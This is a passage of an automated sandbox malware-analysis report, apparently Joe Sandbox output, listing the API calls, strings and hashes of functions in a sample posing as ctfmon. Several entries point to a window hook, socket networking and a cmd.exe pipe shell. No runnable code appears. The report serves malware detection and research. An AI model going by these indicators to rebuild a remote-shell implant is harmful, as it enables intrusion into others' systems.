        • Instruction Fuzzy Hash: 78F01C36200215FFCF219F95EC44D9A7BB9FF18360B448529FA4586120D772D920AB44
        APIs
          • Part of subcall function 00428C05: TlsGetValue.KERNEL32(0053F118,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000), ref: 00428C44
        • GetCurrentThreadId.KERNEL32 ref: 004220B8
        • SetWindowsHookExW.USER32(00000005,Function_00021EF2,00000000,00000000), ref: 004220C8
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CurrentHookThreadValueWindows
        • String ID:
        • API String ID: 933525246-0
        • Opcode ID: 2a60e45d90dbc51d8dff187ae436cece9d4aa2d7a8c02c67daea1e4041fd0ec8
        • Instruction ID: 17601e8b442b9b03c5e5566830a56eca268cea50e62353c77c62ba015712df01
        • Opcode Fuzzy Hash: 2a60e45d90dbc51d8dff187ae436cece9d4aa2d7a8c02c67daea1e4041fd0ec8
        • Instruction Fuzzy Hash: F5E0E531301720AFD2305B22AC05B1776E4EF80B11F90452FE205D1140D7B89846CB7D
        APIs
        • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 0040E231
          • Part of subcall function 0041257D: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125BA
          • Part of subcall function 0041257D: EnterCriticalSection.KERNEL32(?,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125D5
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$AllocateEnterHeapInitialize
        • String ID:
        • API String ID: 1616793339-0
        • Opcode ID: c2eccd4ad7c7d846102367b4257caf7ecf94ba4f496759abc678b985d4644e17
        • Instruction ID: 9efc5791e0f1d7c9c186a67d883c5475a9d78367af9f374711ed2f43329d38d0
        • Opcode Fuzzy Hash: c2eccd4ad7c7d846102367b4257caf7ecf94ba4f496759abc678b985d4644e17
        • Instruction Fuzzy Hash: B9219A31A40215ABDB109BA6EC42BDE7768EB10724F14496FF410FB2D1C778A9918A98
        APIs
        • __EH_prolog.LIBCMT ref: 00421A79
          • Part of subcall function 00428C05: TlsGetValue.KERNEL32(0053F118,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000), ref: 00428C44
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: H_prologValue
        • String ID:
        • API String ID: 3700342317-0
        • Opcode ID: 08febc6eb8c8e99cee7acacc4cfd95ba39e2bfe778b2f071883e8455ad0c05b3
        • Instruction ID: 9dde40da2586159c776057cb4fc6e6fed61ba2f5afb010fcb97a0dbd75fd19cc
        • Opcode Fuzzy Hash: 08febc6eb8c8e99cee7acacc4cfd95ba39e2bfe778b2f071883e8455ad0c05b3
        • Instruction Fuzzy Hash: D8219872A00229EFCF01DF94D482AEE7BB9FF14354F40406AF905AB250D778AE51CBA4
        APIs
        • GetCommandLineW.KERNEL32(76232F60), ref: 00405068
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CommandLine
        • String ID:
        • API String ID: 3253501508-0
        • Opcode ID: d6fc8d5f54c61530a5c77b9057443d1d89c53e4bab3cd9aef80dc24be2ccb722
        • Instruction ID: 5f64aa0511f199e587e2562682c13d905a4b2d41f00720daa4a58be541493b64
        • Opcode Fuzzy Hash: d6fc8d5f54c61530a5c77b9057443d1d89c53e4bab3cd9aef80dc24be2ccb722
        • Instruction Fuzzy Hash: 8701A5B1904750ABC210EB65DC41F5B77A8EB85B24F404A2EF055632C1DB7C9405C7AA
        APIs
        • LoadIconW.USER32(?,00000080), ref: 0040120A
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: IconLoad
        • String ID:
        • API String ID: 2457776203-0
        • Opcode ID: 783db8339120b3803db67abad11e484fa13dc9abfd5022a1b4a4c924fe9f323f
        • Instruction ID: e74f766c04b7c49422ceb5cf71cffa2e33917004825e20756c12fd70ddaf5a09
        • Opcode Fuzzy Hash: 783db8339120b3803db67abad11e484fa13dc9abfd5022a1b4a4c924fe9f323f
        • Instruction Fuzzy Hash: BCF05EB1644760AFD310EF59D941B1AB7E8FB44B60F408A1EF554D7780CBBD9404CBAA
        APIs
        • LoadStringW.USER32(?,?,?,?), ref: 00424B50
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: LoadString
        • String ID:
        • API String ID: 2948472770-0
        • Opcode ID: 695f98c75e655a4ebf45e9277a1d54146fe03b87f83f651db76b8e19ecb3f902
        • Instruction ID: a506e4222beda04e1588787adb9b7428afadcb601b5091b2f91342631f0270ef
        • Opcode Fuzzy Hash: 695f98c75e655a4ebf45e9277a1d54146fe03b87f83f651db76b8e19ecb3f902
        • Instruction Fuzzy Hash: 92D0A976208362EBCB60DF60A848E4FBBE8FF943A0B014C0EF89083210C324E841CB65
        APIs
        • ShowWindow.USER32(?,?,00409949,00000000,?,?,?,?,00000000), ref: 00424376
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ShowWindow
        • String ID:
        • API String ID: 1268545403-0
        • Opcode ID: ed463503181f5831d49e387adaee184ff8ba96adf0051b103f264377ab2b9ac7
        • Instruction ID: 5e28298704729bcf50cadef609a26d81d9e057ba8ea632b21b4816b74d65386d
        • Opcode Fuzzy Hash: ed463503181f5831d49e387adaee184ff8ba96adf0051b103f264377ab2b9ac7
        • Instruction Fuzzy Hash: A3D09230304210AFCB05CFA0DA48A1ABBA2FF94704BA085A9E4468A121D736DC53EB49
        APIs
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Sleep
        • String ID:
        • API String ID: 3472027048-0
        • Opcode ID: c96f40a7069d522f032c98d5448b60f698f4b6c1c1402176db7ae5b90fe826fb
        • Instruction ID: aeaeee24bf346ca11c663ef522bbd7e48f8dbd3ce84c7fe3779714f86709666c
        • Opcode Fuzzy Hash: c96f40a7069d522f032c98d5448b60f698f4b6c1c1402176db7ae5b90fe826fb
        • Instruction Fuzzy Hash: C3B092765672209BD7249B449C426C43B989B0E704F410413DA01672A183F4248A5B9A
        APIs
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Sleep
        • String ID:
        • API String ID: 3472027048-0
        • Opcode ID: c013994515969efd125ce41308ae6106bc53f087768421e2f80ded30106a1cfd
        • Instruction ID: 8d0532a3e790895bab5c54fbd4c8d4022f4858262944ead44d32b07c1e7971d2
        • Opcode Fuzzy Hash: c013994515969efd125ce41308ae6106bc53f087768421e2f80ded30106a1cfd
        • Instruction Fuzzy Hash: E7B0127652723087C3009B449C016C43AD85B0E704F410013C601772E083F424C55F9B
        APIs
        • GetPropA.USER32(?,?), ref: 0041D765
        • CallWindowProcA.USER32(00000000), ref: 0041D787
          • Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Prop$CallProcRemoveWindow
        • String ID: #32770
        • API String ID: 2276450057-463685578
        • Opcode ID: 659aa437e6f9b1db763d0980aaa66f1d77c78cae941e8152d1942417593f74f3
        • Instruction ID: 94ad4723163bdf2d308ea6e45922d28c75bada5694cf6dcea4a57aff3eeba185
        • Opcode Fuzzy Hash: 659aa437e6f9b1db763d0980aaa66f1d77c78cae941e8152d1942417593f74f3
        • Instruction Fuzzy Hash: B4811976B0530477D620BB55EC84FEF776CEF853A5F400427FA0182292D729A985C7BA
        APIs
        • WSAStartup.WS2_32 ref: 00404B01
        • htons.WS2_32(00000000), ref: 00404B33
        • htons.WS2_32(00000000), ref: 00404B3B
        • socket.WS2_32(00000002,00000001,00000000), ref: 00404B59
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: htons$Startupsocket
        • String ID: +*&=^^^^--------PTPM2
        • API String ID: 4109548558-2390715153
        • Opcode ID: e7629c067e5fdbe14b2d9f1b6ed21f636c11199621b624a142a10588866ee9f3
        • Instruction ID: 346ed77a3f42d4ca601688a76fa85a796bd0d35956720dbea263a7c1e4379ff6
        • Opcode Fuzzy Hash: e7629c067e5fdbe14b2d9f1b6ed21f636c11199621b624a142a10588866ee9f3
        • Instruction Fuzzy Hash: 349106715092449FD730CF24AC84AABBBF8EBD4310F44853FE54493390D779A94E9BA6
        APIs
        • CreatePipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403DEF
        • CreatePipe.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403E01
        • CreateProcessW.KERNEL32 ref: 00403E8E
        • Sleep.KERNEL32(000003E8), ref: 00403E99
        • Sleep.KERNEL32(000000C8), ref: 00403EE1
        • PeekNamedPipe.KERNEL32(?,00000000,00001000,?,00000000,00000000), ref: 00403EF8
        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00403F1B
        • WriteFile.KERNEL32(?,exit,00000006,?,00000000), ref: 004040F5
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CreatePipe$FileSleep$NamedPeekProcessReadWrite
        • String ID: +*&=^^^^--------CMD--$cmd.exe$exit$exit
        • API String ID: 4180828904-1671145255
        • Opcode ID: 97d2dc80daee14cd8b07cf939912a4cb6b383654e3bb96b0cd9faa687eacef6c
        • Instruction ID: b70c06b44eefa63bc239fc03f3aab28687b9ac6a1c24dff492d9dcfd48d6b085
        • Opcode Fuzzy Hash: 97d2dc80daee14cd8b07cf939912a4cb6b383654e3bb96b0cd9faa687eacef6c
        • Instruction Fuzzy Hash: 8AA18EB26043099FD714CF64D840BABBBE9BB88700F40493EF649E7380DA75AD068B56
        APIs
        • CallWindowProcA.USER32(00000000,00000000,?,?,?), ref: 0041CFAA
        • DefWindowProcA.USER32(00000000,?,?,?), ref: 0041CFBD
        • IsIconic.USER32(00000000), ref: 0041CFDF
        • SendMessageA.USER32(00000000,000011EF,00000000,00000001), ref: 0041D00C
        • GetWindowLongA.USER32(00000000,000000F0), ref: 0041D01B
        • GetWindowDC.USER32(00000000), ref: 0041D05C
        • GetWindowRect.USER32(00000000,?), ref: 0041D06A
        • InflateRect.USER32(?,000000FF,000000FF), ref: 0041D0AD
        • InflateRect.USER32(?,000000FF,000000FF), ref: 0041D0D0
        • SelectObject.GDI32(00000000,?), ref: 0041D0DE
        • OffsetRect.USER32(?,?,00000000), ref: 0041D134
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Rect$InflateProc$CallIconicLongMessageObjectOffsetSelectSend
        • String ID:
        • API String ID: 2215177122-0
        • Opcode ID: 4307d82b0b8a792f120d9466698bca061e3411348b88fecfdab8711ea9572030
        • Instruction ID: 4c5bc5c323774a5c2da63429ddb1a7b1421399ae9eef4e28febc03626f88aa8e
        • Opcode Fuzzy Hash: 4307d82b0b8a792f120d9466698bca061e3411348b88fecfdab8711ea9572030
        • Instruction Fuzzy Hash: EE817971604301AFC310DF68DC84EABB7E4FB89318F004A2EF94493291E775E94ACB96
        APIs
        • FindResourceA.KERNEL32(?,?,00000002), ref: 0041F7D3
        • SizeofResource.KERNEL32(?,00000000,?,76944920,00000000,7693CF90,?,?,?,?,?,?,?,?,0041D411,00000001), ref: 0041F7ED
        • LoadResource.KERNEL32(?,00000000,?,76944920,00000000,7693CF90,?,?,?,?,?,?,?,?,0041D411,00000001), ref: 0041F7F7
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Resource$FindLoadSizeof
        • String ID:
        • API String ID: 507330600-0
        • Opcode ID: 246115ffcb21acfb6b612898e6a96047005db1a3dcca2133cc8e3dd41b22750f
        • Instruction ID: 9f6e833ce4930495a174d37efbb73787bb1f77972dd9fa55e7fbf6b8b2689a6a
        • Opcode Fuzzy Hash: 246115ffcb21acfb6b612898e6a96047005db1a3dcca2133cc8e3dd41b22750f
        • Instruction Fuzzy Hash: 6C41EF327042145BE70CCE299856AAF77D2EBC9350F448A3EF946C3381DF75950AC3A5
        APIs
        • __EH_prolog.LIBCMT ref: 00425860
        • GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 0042587E
        • lstrcpynW.KERNEL32(?,?,00000104), ref: 0042588D
        • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004258C1
        • CharUpperW.USER32(?), ref: 004258D2
        • FindFirstFileW.KERNEL32(?,?), ref: 004258E8
        • FindClose.KERNEL32(00000000), ref: 004258F4
        • lstrcpyW.KERNEL32(?,?), ref: 00425904
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
        • String ID:
        • API String ID: 304730633-0
        • Opcode ID: eb2e77227feee21f3809df92a7e21bbd02d509cfcaef561014312a0744f67c22
        • Instruction ID: dc0638b164661f47167565fae3824bc1416e181e3646228fdecd816abe73c54b
        • Opcode Fuzzy Hash: eb2e77227feee21f3809df92a7e21bbd02d509cfcaef561014312a0744f67c22
        • Instruction Fuzzy Hash: 7F2192B1A00529EBCB20AF65EC48AEF7F7CFF05764F408126F819D2160D7348A46CBA4
        APIs
          • Part of subcall function 00424368: ShowWindow.USER32(?,?,00409949,00000000,?,?,?,?,00000000), ref: 00424376
        • IsIconic.USER32(?), ref: 004013F1
          • Part of subcall function 004267B7: __EH_prolog.LIBCMT ref: 004267BC
          • Part of subcall function 004267B7: BeginPaint.USER32(?,?,?,?,0040140B), ref: 004267E5
        • SendMessageW.USER32(?,00000027,?,00000000), ref: 00401422
        • GetSystemMetrics.USER32(0000000B), ref: 00401430
        • GetSystemMetrics.USER32(0000000C), ref: 00401436
        • GetClientRect.USER32(?,?), ref: 00401443
        • DrawIcon.USER32(?,?,?,?), ref: 00401478
          • Part of subcall function 00426829: __EH_prolog.LIBCMT ref: 0042682E
          • Part of subcall function 00426829: EndPaint.USER32(?,?,?,?,00401487), ref: 0042684B
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: H_prologMetricsPaintSystem$BeginClientDrawIconIconicMessageRectSendShowWindow
        • String ID:
        • API String ID: 744365313-0
        • Opcode ID: 1e23e38091298bc23035b615d3f8958f05cf2239797f5dc484b3318349e7e02d
        • Instruction ID: 3cd01a1e54c5f11bb01f4eb2d2d637b62c3ac8db24f719d817f91ceb89e6c8c0
        • Opcode Fuzzy Hash: 1e23e38091298bc23035b615d3f8958f05cf2239797f5dc484b3318349e7e02d
        • Instruction Fuzzy Hash: F0118E713043155FC214EF38DC89E6F77A9EBC8308F444A29B585C3290DA74E80A8B55
        APIs
        • lstrcpyW.KERNEL32(-0000002C,?,76228FB0,00000000,00000000,00403769,*.*,00000000), ref: 00405FD9
        • FindFirstFileW.KERNEL32(?,?), ref: 00405FE3
        • GetLastError.KERNEL32 ref: 00405FF1
        • SetLastError.KERNEL32(0000007B,000000FF,00000000,?), ref: 0040603C
          • Part of subcall function 00424A36: lstrlenW.KERNEL32(?,00000000,00406084,000000FF,?,?,?,?,?,00000000,?), ref: 00424A49
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ErrorLast$FileFindFirstlstrcpylstrlen
        • String ID: *.*
        • API String ID: 334723784-438819550
        • Opcode ID: 0eb3c0ce6568269592c83524268b6381258269ac00d58bd2e77033d507aac4d6
        • Instruction ID: 5172b66741902352c281ddeba33db5bac7263c07da9d21b6aa86c91882e6205b
